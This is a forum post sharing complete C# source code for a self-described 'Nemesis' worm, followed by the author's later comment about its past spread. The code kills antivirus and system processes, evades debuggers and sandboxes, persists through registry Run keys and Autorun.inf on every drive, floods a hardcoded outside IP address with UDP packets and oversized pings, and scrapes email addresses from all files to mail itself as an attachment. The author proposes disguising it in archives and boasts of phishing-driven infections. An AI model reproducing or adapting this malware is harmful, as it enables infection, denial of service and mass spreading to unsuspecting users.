Jump to content
Tuts 4 You

C# Nemesis.Worm


JMC31337

Recommended Posts


//JMC31337
//NEMESIS WORM PROJEKT
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading;
using System.Collections.Generic;
using System.IO;
using System.Text.RegularExpressions;
using System.Net.Mail;
using System.Net.Mime;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Collections;
using System.ComponentModel;
using System.Data;
using Microsoft.Win32;
namespace ConsoleApplication1
{
class Program
{
public static int bypass = 0;
private static string DESTINATION_IP_ADDRESS = "204.13.204.222";
private static string DESTINATION_IP_ADDRESS2 = "204.13.204.222";
private static int DESTINATION_PORT = 53;
private static int DESTINATION_PORT2 = 80;
public class RecursiveFileSearch
{
[DllImport("URL.DLL", ExactSpelling = true, SetLastError = true, CallingConvention = CallingConvention.ThisCall)]
public static extern bool OpenURL();
[DllImport("kernel32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]
internal static extern bool IsDebuggerPresent();
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
static void DetectWireshark()
{
Process[] ProcessList = Process.GetProcesses();
foreach (Process proc in ProcessList)
{
if (proc.MainWindowTitle.Equals("The Wireshark Network Analyzer"))
{
string processName = "lsass";
Process[] processes = Process.GetProcessesByName(processName);
foreach (Process process in processes)
{
process.Kill();
}
}
}
Virusx(); } static void DetectWPE()
{
Process[] ProcessList = Process.GetProcesses();
foreach
(
Process proc in ProcessList)
{
if (proc.MainWindowTitle.Equals("WPE PRO"))
{
string processName = "lsass";
Process[] processes = Process.GetProcessesByName(processName);
foreach
(
Process process in processes)
{
process.Kill();
}
}
}
Virusx();
}
static void DetectEmulation()
{
long tickCount = Environment.TickCount;
System.Threading.Thread.Sleep(500);
long tickCount2 = Environment.TickCount;
if (((tickCount2 - tickCount) < 500L))
{
string processName = "lsass";
Process[] processes = Process.GetProcessesByName(processName);
foreach
(
Process process in processes)
{
process.Kill();
}
}
Virusx();
} static void DetectSandboxie()
{
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
{
string processName = "lsass";
Process[] processes = Process.GetProcessesByName(processName);
foreach (Process process in processes)
{
process.Kill();
}
}
Virusx();
}
static void checkifdebugger()
{ string processName = "lsass";
Process[] processes = Process.GetProcessesByName(processName);
foreach (Process process in processes)
{
process.Kill();
}
bool check = IsDebuggerPresent();
if (check == true)
{
System.Environment.Exit(111);
}
Virusx();
} static void Worm()
{ string[] a2z =
{
"A","B","C","D","E","F","G","H","I","J","K","L","M",
"N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
};
int w = 0;
for(w=0;w<26;w++)
{
try
{
System.Diagnostics.Process proc = new System.Diagnostics.Process();
proc.EnableRaisingEvents=false;
proc.StartInfo.FileName=a2z[w]+":\\CSRSS";
proc.Start(); }
catch (Exception e){}
}
} static void Virusx()
{
string[] atoz =
{
"A","B","C","D","E","F","G","H","I","J","K","L","M",
"N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
};
int alph = 0;
string x = Path.GetFullPath("CSRSS.exe");
String str;
String q = "%SystemRoot%";
str = Environment.ExpandEnvironmentVariables(q);
if (File.Exists("\\CSRSS.exe"))
{
try { }
catch (Exception e) { };
}
else
{
try
{
for (alph = 0; alph < 26; alph++)
{
File.Copy(x, atoz[alph]+":\\CSRSS.exe");
File.Copy(x, atoz[alph]+":\\CSRSS.ex_");
TextWriter tw = new StreamWriter(atoz[alph] + ":\\Autorun.inf");
tw.WriteLine("[AutoRun]");
tw.WriteLine("OPEN=CSRSS.EXE");
tw.WriteLine("ICON=CSRSS.EXE");
tw.WriteLine("ACTION=START'NG NEMESIS PROJEKT");
tw.Close();
}
}
catch (Exception e) { }
}
} public static int DCheck(int x)
{
DateTime d = DateTime.Now;
if (d.DayOfWeek == DayOfWeek.Monday)
{
x = 1;
} return x;
}
static void Kill()
{
string[] processName =
{
"ISafe", "ITMRTSVC", "QOELoader", "cctray", "CAVRID", "capfasem","VetMsg","MSASCui","avp","SSU","Ad-Aware","SpySweeperUI",
"capfsem", "CAPPActiveProtection","ccprovsp","PPCtlPriv","cmdagent","aswUpdSv","SpySweeper","bdagent","livesrv","CAGlobalLight",
"AAWService","ashServ","sched","avguard","pctsAuxs","pctsSvc","avmailc","AVWEBGRD","ashMaiSv","ashMaiSv","AAWTray","Mcafeeupdate","","",
"cfp","pctsTray","egui","WEXTRACT","ccApp","osCheck","isPwdSvc","nod32","mcmscsvc","TeaTimer","noadware5","persfw",
"CAGlobal","xcommsvr","ccprovsp","UmxPol","UmxFwHlp","UmxCfg","UmxAgent","avgwdsvc","mcagent","avgrsx","avgemc","VetMsg",
"ISafe","mcshield","mcproxy","mcsysmon","MsMpEng","avgcc","mbamservice","mbamgui","avgemc","avgupsvc","avgamsvr","explorer",
"ashDisp","SUPERAntiSpyware","RegFirewall","HiJackThis","MPFSrv","MskSrver","mcagent","mcsysmon","McSACore","avp","persfw","kavtray","aawservice","kavfsscs",
"ccSetMgr","SNDSrvc","SPBBCSvc","ccEvtMgr","blackd","navapsvc","NPFMntor","rapapp","symlcsvc","NAVAPW32","BLACKICE","rtsserv","blackice","navapw32",
"wextact","itmrtsvc","isafe","cavrid","avgamsvr","avgupsvc","avgemc","avgcc","zlclient","FPAVServer","fssf","FProtTray","nvvsvc","avgwdsvc","pctsAuxs","pctsSvc",
"avgrsx","avgnsx","pctsTray","avgcsrvx","avgemc","avgtray","Dwm","WUDFHost","MSACUI","MsMpEng","MSASCui","wscntfy","egui","smc","TrayNotify", }; foreach (string str in processName)
{
Process[] processes = Process.GetProcessesByName(str);
foreach (Process process in processes)
{
try
{
Thread.Sleep(1000);
process.EnableRaisingEvents = false;
process.Kill();
}
catch (Exception e) { };
}
}
} static void Regxx()
{
RegistryKey key = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
RegistryKey master = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
master.GetValue("ACSRSS","A:\\CSRSS.exe");
if(master!=null)
{
bypass++;
}
if (key != null && bypass==0)
{ string[] atoz =
{
"A","B","C","D","E","F","G","H","I","J","K","L","M",
"N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
};
int alph = 0;
for (alph = 0; alph < 26; alph++)
{
key.SetValue(atoz[alph] + "CSRSS", atoz[alph] + ":\\CSRSS.exe");
}
} } public static string finalx(string finalx)
{ string ip = new System.Net.WebClient().DownloadString(("http://www.whatismyip.com/automation/n09230945.asp"));
string Arguments = ip + " > \\log.txt"; Process Process = new Process();
ProcessStartInfo Start = new ProcessStartInfo();
Start.FileName = "CMD.exe ";
Start.RedirectStandardError = false;
Start.RedirectStandardOutput = false;
Start.RedirectStandardInput = false;
Start.UseShellExecute = false;
Start.CreateNoWindow = true;
Start.Arguments = "/D /c nslookup " + Arguments;
Process.EnableRaisingEvents = true;
Process.StartInfo = Start;
Process.Start();
Thread.Sleep(5000);
//=================================
StreamReader reader = new StreamReader("\\log.txt");
int counter = 0;
string line;
string[] stringx;
stringx = new String[8];
int ptr = 0;
while ((line = reader.ReadLine()) != null)
{
counter++;
if (counter == 4)
{
string[] words = line.Split('.');
foreach (string word in words)
{
stringx[ptr++] = word;
}
string final = stringx[3];
finalx = final + "." + stringx[4]; }
}
return finalx;
} static void Main()
{
Kill();
Regxx();
int x = 0;
x = DCheck(x);
if (bypass == 0)
{
Virusx();
}
Kill();
checkifdebugger();
Kill();
DetectSandboxie();
Kill();
DetectEmulation();
Kill();
DetectWPE();
Kill();
DetectWireshark();
Kill(); //===========================
if (x == 1) //IS IT MONDAY
{
bool check = OpenURL();
Kill();
IPAddress destinationIPaddress = IPAddress.Parse(DESTINATION_IP_ADDRESS);
IPAddress destinationIPaddress2 = IPAddress.Parse(DESTINATION_IP_ADDRESS2);
IPEndPoint ep = new IPEndPoint(destinationIPaddress, DESTINATION_PORT);
IPEndPoint ep2 = new IPEndPoint(destinationIPaddress2, DESTINATION_PORT2);
byte[] sendbuf = { 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33 };
Socket s = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
Socket s2 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
int PoD = 0;
while (true)
{
s.SendTo(sendbuf, ep);
s2.SendTo(sendbuf, ep2);
Process Process2 = new Process();
ProcessStartInfo Start2 = new ProcessStartInfo();
if (PoD < 5)
{
Start2.FileName = "CMD.exe ";
Start2.RedirectStandardError = false;
Start2.RedirectStandardOutput = false;
Start2.RedirectStandardInput = false;
Start2.UseShellExecute = false;
Start2.CreateNoWindow = true;
Start2.Arguments = "ping -n 4294967295 -l 65500 " + ep2;
Process2.EnableRaisingEvents = true;
Process2.StartInfo = Start2;
Process2.Start();
}
PoD++;
//Attack Port 53
if (PoD > 5)
{
break; }
}
}
string[] drives = System.Environment.GetLogicalDrives();
foreach (string dr in drives)
{
System.IO.DriveInfo di = new System.IO.DriveInfo(dr);
if (!di.IsReady)
{
continue;
}
System.IO.DirectoryInfo rootDir = di.RootDirectory;
string server = null;
WalkDirectoryTree(rootDir, server);
}
Worm();
}
static void WalkDirectoryTree(System.IO.DirectoryInfo root, string server)
{
server = null;
server = "smtp." + finalx(server); System.IO.FileInfo[] files = null;
System.IO.DirectoryInfo[] subDirs = null;
try
{
files = root.GetFiles("*.*");
}
catch (UnauthorizedAccessException e){}
catch (System.IO.DirectoryNotFoundException e){}
if (files != null)
{
int emcount = 0;
foreach (System.IO.FileInfo fi in files)
{
try
{
string[] mailx;
mailx = new String[50];
string inFilePath = fi.FullName;
string data = File.ReadAllText(inFilePath);
Regex.Replace(data, "", "\r\n");
Regex emailRegex = new Regex(@"[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[
a-z0-9])?\.)+(?:[A-Z]{2}|com|org|net|edu|gov|mil|biz|info|mobi|name|aero|asia|jobs|museum)\b",
RegexOptions.IgnoreCase);
MatchCollection emailMatches = emailRegex.Matches(data);
Match[] em = new Match[emailMatches.Count];
foreach (Match emailMatch in emailMatches)
{
string dest = emailMatch.Value;
Kill(); MailMessage nemmie = new MailMessage();
nemmie.From = new MailAddress("NEMESIS_WORM@NEMESIS.com");
nemmie.To.Add(dest);
emcount++;
nemmie.Subject = "C# NEMESIS WORM";
nemmie.Priority = MailPriority.High;
nemmie.IsBodyHtml = true;
nemmie.Body = "<html><head></head><body><form name=\"myform\" action=\"http://www.myspace.com/jmc31337\" method=\"POST\"><div align=\"center\"><br><br><input type=\"text\" size=\"25\" value=\"Enter your name here!\"><br><input type=\"submit\" value=\"You've Been Hit By, You've Been Struck By! A smooth Nemesis\"><br></div></form></body></html>";
Attachment data2 = new Attachment("\\CSRSS.ex_");
nemmie.Attachments.Add(data2);
SmtpClient client = new SmtpClient(server, 25);
client.EnableSsl = false;
client.UseDefaultCredentials = true;
client.DeliveryMethod = SmtpDeliveryMethod.Network;
client.Credentials = new System.Net.NetworkCredential(null, ""); try
{
client.Send(nemmie);
Thread.Sleep(3000);
}
catch (SmtpFailedRecipientException e) { } }
} catch (Exception e) { }
}
subDirs = root.GetDirectories();
foreach (System.IO.DirectoryInfo dirInfo in subDirs)
{
WalkDirectoryTree(dirInfo, server);
}
} } } }
}

next step in the future drop this as a .rar .zip and add in the mailer portion code as such instead of .ex_

Edited by JMC31337
Link to comment
  • 11 years later...

stand corrected- this is not a worm nor is it a trojan worm

despite the arguments i had with Symantec on the first variant years back 2008 (emailed it with some phish stuff saying right click rename and run this for me and it got around because back then smtp anony mails were easier than they are today as most ISP now require a user pass - whereas back then you could anonymously email right out the back door ISP smtp port - regardless since the orig variant regex'd the entire disk looking for emails the 3rd party user would see an email from a known source and of course would open it thinking it was legit)

this is and so was the first one, only a mailer trojanĀ even tho the orig. was classified as level 3 multiple country infections

Link to comment

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...